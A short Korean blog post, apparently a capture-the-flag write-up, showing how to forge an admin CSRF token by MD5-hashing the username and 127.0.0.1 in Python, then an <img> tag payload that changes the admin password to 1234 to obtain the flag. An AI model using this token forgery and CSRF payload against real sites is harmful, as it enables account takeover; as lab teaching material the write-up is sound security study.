728x90
from hashlib import md5
id = b'admin'
ip_addr = b'127.0.0.1'
csrf_token = md5(id+ip_addr).hexdigest()
print(csrf_token)
이렇게 하면 해당 csrf_token을 얻을 수 있고
<img src="/change_password?username=admin&pw=1234&csrftoken=7505b9c72ab4aa94b1a4ed7b207b67fb">
이렇게하면 비밀번호까지 변경할 수 있다.
admin/1234로 로그인하면 플래그를 얻을 수 있다.
728x90
'호그와트' 카테고리의 다른 글
| 가볍게 천재가 되는 방법 (0) | 2022.07.05 |
|---|---|
| 기본 성적 확장하기 (0) | 2022.07.02 |
| go로 서버 뚫는 법 (0) | 2022.06.25 |
| 블록체인은 행복입니다 (0) | 2022.06.24 |
| 드림핵 out of bound (0) | 2022.06.21 |